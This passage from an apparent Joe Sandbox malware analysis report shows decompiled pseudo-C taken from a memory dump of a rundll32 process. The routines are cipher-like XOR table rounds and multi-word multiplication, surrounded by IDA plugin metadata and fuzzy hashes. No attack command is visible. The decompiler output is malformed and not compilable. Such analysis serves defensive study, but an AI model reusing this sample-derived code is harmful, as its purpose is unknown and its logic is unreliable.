                                        				r14d = _t864;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r14d = r14d << 0x18;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				r14d = r14d ^ r11d >> 0x00000008;
                                        				 *(__rdx + 0x44) = r8d;
                                        				r11d = r11d << 0x18;
                                        				r11d = r11d ^ _t864 >> 0x00000008;
                                        				r10d = r11d;
                                        				r10d = r10d - _t842;
                                        				r9d = _t889 - 0x6ef3733c;
                                        				r9d = r9d + _t704;
                                        				r10d = r10d + 0x6ef3733c;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = _t889 + 0x22191988;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x48) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = r11d;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t868 = _t842 >> 0x00000018 ^ _t704 << 0x00000008;
                                        				r9d = r9d + _t868;
                                        				 *(__rdx + 0x4c) = r8d;
                                        				_t706 = _t704 >> 0x00000018 ^ _t842 << 0x00000008;
                                        				r10d = r10d - _t706;
                                        				r10d = r10d - 0x22191988;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r11d = r11d >> 8;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x50) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t846 = r11d << 0x00000018 ^ r14d >> 0x00000008;
                                        				 *(__rdx + 0x54) = r8d;
                                        				r14d = r14d << 0x18;
                                        				r14d = r14d ^ r11d;
                                        				r10d = r14d;
                                        				r10d = r10d - _t706;
                                        				r9d = __rsi + 0x4432330f;
                                        				r9d = r9d + _t868;
                                        				r10d = r10d - 0x4432330f;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = __rsi - 0x779b99e3;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x58) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = r14d;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t829 = _t706 >> 0x00000018 ^ _t868 << 0x00000008;
                                        				r9d = r9d + _t829;
                                        				 *(__rdx + 0x5c) = r8d;
                                        				_t870 = _t868 >> 0x00000018 ^ _t706 << 0x00000008;
                                        				r10d = r10d - _t870;
                                        				r10d = r10d + 0x779b99e3;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r11d = _t870;
                                        				r14d = r14d >> 8;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r11d = r11d >> 0x18;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x60) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				_t710 = r14d << 0x00000018 ^ _t846 >> 0x00000008;
                                        				 *(__rdx + 0x64) = r8d;
                                        				_t848 = _t846 << 0x00000018 ^ r14d;
                                        				r10d = _t848;
                                        				r10d = r10d - _t870;
                                        				r9d = __rbx + 0x10c8cc3a;
                                        				r9d = r9d + _t829;
                                        				r10d = r10d - 0x10c8cc3a;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = __rbx + 0x21919873;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x68) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r10d = _t848;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				r11d = r11d ^ _t829 << 0x00000008;
                                        				r9d = r9d + r11d;
                                        				 *(__rdx + 0x6c) = r8d;
                                        				_t831 = _t829 >> 0x00000018 ^ _t870 << 0x00000008;
                                        				r10d = r10d - _t831;
                                        				r10d = r10d - 0x21919873;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r9d = _t848;
                                        				r9d = r9d << 0x18;
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x70) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				r9d = r9d ^ _t710 >> 0x00000008;
                                        				 *(__rdx + 0x74) = r8d;
                                        				r9d = r9d + 0x432330e5;
                                        				r9d = r9d + r11d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x78) = r8d;
                                        				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
                                        				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
                                        				 *(__rdx + 0x7c) = r8d;
                                        				return (_t710 << 0x00000018 ^ _t848 >> 0x00000008) - _t831 - 0x432330e5 & 0x000000ff;
                                        			}

                                        0x21ef3065e5f
                                        0x21ef3065e68
                                        0x21ef3065e6b
                                        0x21ef3065e72
                                        0x21ef3065e79
                                        0x21ef3065ea8
                                        0x21ef3065eb0
                                        0x21ef3065ebf
                                        0x21ef3065ec7
                                        0x21ef3065edd
                                        0x21ef3065ee1
                                        0x21ef3065eec
                                        0x21ef3065eff
                                        0x21ef3065f07
                                        0x21ef3065f0b
                                        0x21ef3065f15

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31e3b7c082f65b695226498d53966589e12bef04b774bf150734c91cb6e4500f
                                        • Instruction ID: e239dff334601b97f1dce3a6bccbb89a115769d02882ab0b4a743452510979e2
                                        • Opcode Fuzzy Hash: 31e3b7c082f65b695226498d53966589e12bef04b774bf150734c91cb6e4500f
                                        • Instruction Fuzzy Hash: 3E52A1736301B44BE3514F2E585CD6A3698F366789FC35206FB8187A81C93DBA16DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33dc1acb22e4eda7845a980b6a38efd86fb36dd83f01a3930f08ffabbc344d86
                                        • Instruction ID: 69919a679b8b7ed3f85dc72c189b255fa971b774eea06aa938c3df2bfc05be35
                                        • Opcode Fuzzy Hash: 33dc1acb22e4eda7845a980b6a38efd86fb36dd83f01a3930f08ffabbc344d86
                                        • Instruction Fuzzy Hash: 0362A173215F998AEB80CF65C8155DE37B2F388789B9A9113EE8C53715DA3CD22AC701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2aa3f3a9f7ae7718ff181e15156be58ba4c42ce4d0bed5918b3f27e3905f666d
                                        • Instruction ID: 59ac2cca2396c0a09fbd95931592eec44a70c9b8f4cfefd09ca236c6f27a7a6d
                                        • Opcode Fuzzy Hash: 2aa3f3a9f7ae7718ff181e15156be58ba4c42ce4d0bed5918b3f27e3905f666d
                                        • Instruction Fuzzy Hash: 8412F7E3B3C1B04BE36D8B29E851B69BED0F395749B486019FA96D3B42D53CCA519F00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 99%
                                        			E0000021E21EF3092050(void* __eax, void* __ecx, signed int __rbx, long long __rcx, signed int __rdx, long long __rsi, long long __rbp, signed int __r8, signed int __r11, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				void* _t264;
                                        				void* _t282;
                                        				void* _t284;
                                        				void* _t286;
                                        				signed long long _t297;
                                        				void* _t302;
                                        				signed long long _t304;
                                        				signed long long _t308;
                                        				signed long long _t312;
                                        				signed long long _t316;
                                        				signed long long _t320;
                                        				signed long long _t324;
                                        				signed long long _t328;
                                        				signed long long _t332;
                                        				signed long long _t336;
                                        				signed long long _t340;
                                        				signed long long _t344;
                                        				signed long long _t348;
                                        				signed long long _t352;
                                        				signed long long _t356;
                                        				unsigned long long _t361;
                                        				signed long long _t364;
                                        				signed long long _t365;
                                        				void* _t411;
                                        				void* _t419;
                                        				void* _t428;
                                        				void* _t436;
                                        				void* _t441;
                                        				unsigned long long _t452;
                                        				signed long long _t455;
                                        				signed long long _t456;
                                        				signed long long _t458;
                                        				signed long long _t459;
                                        				signed long long _t461;
                                        				signed long long _t462;
                                        				signed long long _t464;
                                        				signed long long _t465;
                                        				signed long long _t467;
                                        				signed long long _t468;
                                        				signed long long _t470;
                                        				signed long long _t471;
                                        				signed long long _t473;
                                        				signed long long _t474;
                                        				signed long long _t476;
                                        				signed long long _t477;
                                        				signed long long _t479;
                                        				signed long long _t480;
                                        				signed long long _t482;
                                        				signed long long _t483;
                                        				signed long long _t485;
                                        				signed long long _t486;
                                        				signed long long _t488;
                                        				signed long long _t489;
                                        				signed long long _t491;
                                        				signed long long _t492;
                                        				signed long long _t494;
                                        				signed long long _t495;
                                        				signed long long _t497;
                                        				unsigned long long _t499;
                                        				signed long long _t500;
                                        				unsigned long long _t502;
                                        				signed long long _t503;
                                        				unsigned long long _t505;
                                        				signed long long _t506;
                                        				unsigned long long _t508;
                                        				signed long long _t509;
                                        				unsigned long long _t511;
                                        				signed long long _t512;
                                        				unsigned long long _t514;
                                        				signed long long _t515;
                                        				unsigned long long _t517;
                                        				signed long long _t518;
                                        				unsigned long long _t520;
                                        				signed long long _t521;
                                        				unsigned long long _t523;
                                        				signed long long _t524;
                                        				unsigned long long _t526;
                                        				signed long long _t527;
                                        				unsigned long long _t529;
                                        				signed long long _t530;
                                        				unsigned long long _t532;
                                        				signed long long _t533;
                                        				unsigned long long _t535;
                                        				signed long long _t536;
                                        				unsigned long long _t538;
                                        				signed long long _t541;
                                        				signed long long _t542;
                                        				signed long long _t544;
                                        				signed long long _t547;
                                        				signed long long _t549;
                                        				signed long long _t551;
                                        				signed long long _t553;
                                        				signed long long _t555;
                                        				signed long long _t557;
                                        				signed long long _t559;
                                        				signed long long _t561;
                                        				signed long long _t563;
                                        				signed long long _t565;
                                        				signed long long _t567;
                                        				signed long long _t569;
                                        				signed long long _t571;
                                        				void* _t577;
                                        				intOrPtr _t584;
                                        				void* _t585;
                                        
                                        				_a16 = __rbx;
                                        				_a24 = __rbp;
                                        				_a32 = __rsi;
                                        				_a8 = __rcx;
                                        				_t541 =  *__rdx >> 0x20;
                                        				r11d = r9d;
                                        				_t497 =  *__r8 >> 0x20;
                                        				_t542 = _t541 * _t497;
                                        				_t361 = __rdx * _t497 + _t541 * __r11;
                                        				_t294 =  >=  ? _t542 : _t542 + 0;
                                        				_t295 = ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20);
                                        				 *((long long*)(__rcx)) = __rbx * __r11 + (_t361 << 0x20);
                                        				_t411 =  >=  ? ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20) : ( >=  ? _t542 : _t542 + 0) + (_t361 >> 0x20) + 1;
                                        				r8d = r10d;
                                        				_t364 =  *__rdx >> 0x20;
                                        				r9d = __ecx;
                                        				_t297 =  *(__r8 + 8) >> 0x20;
                                        				_t365 = _t364 * _t297;
                                        				_t452 = __r8 * _t297 + _t364 * _t497;
                                        				_t299 =  >=  ? _t365 : _t365 + 0;
                                        				_t300 = ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20);
                                        				_t544 = _t542 * _t497 + (_t452 << 0x20);
                                        				r11d = r8d;
                                        				_t190 =  >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1;
                                        				r9d = r11d;
                                        				_t302 =  >=  ?  >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1 : ( >=  ? ( >=  ? _t365 : _t365 + 0) + (_t452 >> 0x20) : _t300 + 1) + 1;
                                        				_t436 = _t302;
                                        				asm("dec eax");
                                        				r15d = 0;
                                        				dil = _t436 - _t302 > 0;
                                        				r10d = __ecx;
                                        				_t455 =  *(__rdx + 8) >> 0x20;
                                        				_t304 =  *__r8 >> 0x20;
                                        				_t456 = _t455 * _t304;
                                        				_t499 = _t497 * _t304 + _t455 * _t544;
                                        				_t368 =  >=  ? _t456 : 0 + _t456;
                                        				_t13 = _t411 + 1; // 0x1
                                        				_t369 = ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20);
                                        				_t500 = _t499 << 0x20;
                                        				_t14 = _t369 + 1; // 0x100000001
                                        				_t547 = __r11 * _t544 + _t500;
                                        				_t306 =  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14;
                                        				 *((long long*)(__rcx + 8)) = _t544 + _t411 + _t547;
                                        				r11d = r8d;
                                        				_t17 = _t306 + 1; // 0x100000002
                                        				r9d = r11d;
                                        				_t196 =  >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17;
                                        				_t437 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17);
                                        				r10d = __ecx;
                                        				_t282 =  >=  ? _t411 : _t13;
                                        				_t308 =  *__r8 >> 0x20;
                                        				_t458 =  *(__rdx + 0x10) >> 0x20;
                                        				_t459 = _t458 * _t308;
                                        				_t502 = _t500 * _t308 + _t458 * _t544;
                                        				_t371 =  >=  ? _t459 : _t459 + 0;
                                        				_t372 = ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20);
                                        				_t503 = _t502 << 0x20;
                                        				_t20 = _t372 + 1; // 0x100000001
                                        				_t549 = _t547 * _t544 + _t503;
                                        				_t310 =  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20;
                                        				_t438 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t21 = _t310 + 1; // 0x100000002
                                        				_t202 =  >=  ?  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20 : _t21;
                                        				r10d = __ecx;
                                        				_t577 = _t282 + ( >=  ?  >=  ? ( >=  ? _t459 : _t459 + 0) + (_t502 >> 0x20) : _t20 : _t21);
                                        				_t312 =  *(__r8 + 8) >> 0x20;
                                        				_t461 =  *(__rdx + 8) >> 0x20;
                                        				_t26 = _t282 + 1; // 0x1
                                        				_t462 = _t461 * _t312;
                                        				_t505 = _t503 * _t312 + _t461 * _t544;
                                        				_t374 =  >=  ? _t462 : _t462 + 0;
                                        				_t375 = ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20);
                                        				_t506 = _t505 << 0x20;
                                        				_t28 = _t375 + 1; // 0x100000001
                                        				_t551 = _t549 * _t544 + _t506;
                                        				_t314 =  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28;
                                        				_t439 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551;
                                        				_t29 = _t314 + 1; // 0x100000002
                                        				_t208 =  >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29;
                                        				_t578 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29);
                                        				_t413 =  >=  ? _t282 : _t26;
                                        				r10d = __ecx;
                                        				_t316 =  *(__r8 + 0x10) >> 0x20;
                                        				r11d = r8d;
                                        				_t31 = _t413 + 1; // 0x2
                                        				_t464 =  *__rdx >> 0x20;
                                        				r9d = r11d;
                                        				_t465 = _t464 * _t316;
                                        				_t508 = _t506 * _t316 + _t464 * _t544;
                                        				_t377 =  >=  ? _t465 : _t465 + 0;
                                        				_t378 = ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20);
                                        				_t509 = _t508 << 0x20;
                                        				_t33 = _t378 + 1; // 0x100000001
                                        				_t553 = _t551 * _t544 + _t509;
                                        				_t318 =  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33;
                                        				_t440 = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551 + _t553;
                                        				_t34 = _t318 + 1; // 0x100000002
                                        				_t214 =  >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34;
                                        				_t579 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34);
                                        				_t284 =  >=  ?  >=  ? _t282 : _t26 : _t31;
                                        				 *((long long*)(_a8 + 0x10)) = _t436 + ( >=  ?  >=  ? ( >=  ? _t456 : 0 + _t456) + (_t499 >> 0x20) : _t14 : _t17) + _t549 + _t551 + _t553;
                                        				r10d = __ecx;
                                        				_t320 =  *(__r8 + 0x18) >> 0x20;
                                        				r11d = r8d;
                                        				_t467 =  *__rdx >> 0x20;
                                        				r9d = r11d;
                                        				_t468 = _t467 * _t320;
                                        				_t511 = _t509 * _t320 + _t467 * _t544;
                                        				_t380 =  >=  ? _t468 : _t468 + 0;
                                        				_t381 = ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20);
                                        				_t512 = _t511 << 0x20;
                                        				_t40 = _t381 + 1; // 0x100000001
                                        				_t555 = _t553 * _t544 + _t512;
                                        				_t322 =  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40;
                                        				_t580 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t41 = _t322 + 1; // 0x100000002
                                        				_t221 =  >=  ?  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40 : _t41;
                                        				r10d = __ecx;
                                        				_t441 = _t284 + ( >=  ?  >=  ? ( >=  ? _t468 : _t468 + 0) + (_t511 >> 0x20) : _t40 : _t41);
                                        				_t470 =  *(__rdx + 8) >> 0x20;
                                        				_t324 =  *(__r8 + 0x10) >> 0x20;
                                        				_t471 = _t470 * _t324;
                                        				_t514 = _t512 * _t324 + _t470 * _t544;
                                        				_t383 =  >=  ? _t471 : _t471 + 0;
                                        				_t47 = _t284 + 1; // 0x1
                                        				_t384 = ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20);
                                        				_t515 = _t514 << 0x20;
                                        				_t49 = _t384 + 1; // 0x100000001
                                        				_t557 = _t555 * _t544 + _t515;
                                        				_t326 =  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49;
                                        				_t581 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t50 = _t326 + 1; // 0x100000002
                                        				_t227 =  >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50;
                                        				_t442 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50);
                                        				r10d = __ecx;
                                        				_t415 =  >=  ? _t284 : _t47;
                                        				_t328 =  *(__r8 + 8) >> 0x20;
                                        				_t473 =  *(__rdx + 0x10) >> 0x20;
                                        				_t474 = _t473 * _t328;
                                        				_t517 = _t515 * _t328 + _t473 * _t544;
                                        				_t386 =  >=  ? _t474 : _t474 + 0;
                                        				_t53 = _t415 + 1; // 0x2
                                        				_t387 = ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20);
                                        				_t518 = _t517 << 0x20;
                                        				_t55 = _t387 + 1; // 0x100000001
                                        				_t559 = _t557 * _t544 + _t518;
                                        				_t330 =  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55;
                                        				_t582 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t56 = _t330 + 1; // 0x100000002
                                        				_t233 =  >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56;
                                        				_t443 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56);
                                        				r10d = __ecx;
                                        				_t427 =  >=  ?  >=  ? _t284 : _t47 : _t53;
                                        				_t332 =  *__r8 >> 0x20;
                                        				_t476 =  *(__rdx + 0x18) >> 0x20;
                                        				_t57 = _t427 + 1; // 0x3
                                        				_t477 = _t476 * _t332;
                                        				_t520 = _t518 * _t332 + _t476 * _t544;
                                        				_t389 =  >=  ? _t477 : _t477 + 0;
                                        				_t390 = ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20);
                                        				_t521 = _t520 << 0x20;
                                        				_t59 = _t390 + 1; // 0x100000001
                                        				_t561 = _t559 * _t544 + _t521;
                                        				_t334 =  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59;
                                        				_t583 = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559 + _t561;
                                        				_t60 = _t334 + 1; // 0x100000002
                                        				_t239 =  >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60;
                                        				_t444 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60);
                                        				_t286 =  >=  ?  >=  ?  >=  ? _t284 : _t47 : _t53 : _t57;
                                        				 *((long long*)(_a8 + 0x18)) = _t577 + ( >=  ?  >=  ? ( >=  ? _t462 : _t462 + 0) + (_t505 >> 0x20) : _t28 : _t29) + ( >=  ?  >=  ? ( >=  ? _t465 : _t465 + 0) + (_t508 >> 0x20) : _t33 : _t34) + _t555 + _t557 + _t559 + _t561;
                                        				r10d = __ecx;
                                        				_t336 =  *(__r8 + 8) >> 0x20;
                                        				r11d = r8d;
                                        				_t479 =  *(__rdx + 0x18) >> 0x20;
                                        				r9d = r11d;
                                        				_t480 = _t479 * _t336;
                                        				_t523 = _t521 * _t336 + _t479 * _t544;
                                        				_t392 =  >=  ? _t480 : _t480 + 0;
                                        				_t393 = ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20);
                                        				_t524 = _t523 << 0x20;
                                        				_t67 = _t393 + 1; // 0x100000001
                                        				_t563 = _t561 * _t544 + _t524;
                                        				_t338 =  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67;
                                        				_t445 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t68 = _t338 + 1; // 0x100000002
                                        				_t246 =  >=  ?  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67 : _t68;
                                        				r10d = __ecx;
                                        				_t428 = _t286 + ( >=  ?  >=  ? ( >=  ? _t480 : _t480 + 0) + (_t523 >> 0x20) : _t67 : _t68);
                                        				_t340 =  *(__r8 + 0x10) >> 0x20;
                                        				_t482 =  *(__rdx + 0x10) >> 0x20;
                                        				_t483 = _t482 * _t340;
                                        				_t74 = _t286 + 1; // 0x1
                                        				_t526 = _t524 * _t340 + _t482 * _t544;
                                        				_t395 =  >=  ? _t483 : _t483 + 0;
                                        				_t396 = ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20);
                                        				_t527 = _t526 << 0x20;
                                        				_t76 = _t396 + 1; // 0x100000001
                                        				_t565 = _t563 * _t544 + _t527;
                                        				_t342 =  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76;
                                        				_t446 = _t441 + ( >=  ?  >=  ? ( >=  ? _t471 : _t471 + 0) + (_t514 >> 0x20) : _t49 : _t50) + ( >=  ?  >=  ? ( >=  ? _t474 : _t474 + 0) + (_t517 >> 0x20) : _t55 : _t56) + ( >=  ?  >=  ? ( >=  ? _t477 : _t477 + 0) + (_t520 >> 0x20) : _t59 : _t60) + _t563 + _t565;
                                        				r11d = r8d;
                                        				r9d = r11d;
                                        				_t77 = _t342 + 1; // 0x100000002
                                        				_t252 =  >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77;
                                        				_t429 = _t428 + ( >=  ?  >=  ? ( >=  ? _t483 : _t483 + 0) + (_t526 >> 0x20) : _t76 : _t77);
                                        				r10d = __ecx;
                                        				_t418 =  >=  ? _t286 : _t74;
                                        				_t485 =  *(__rdx + 8) >> 0x20;
                                        				_t344 =  *(__r8 + 0x18) >> 0x20;
                                        				_t486 = _t485 * _t344;
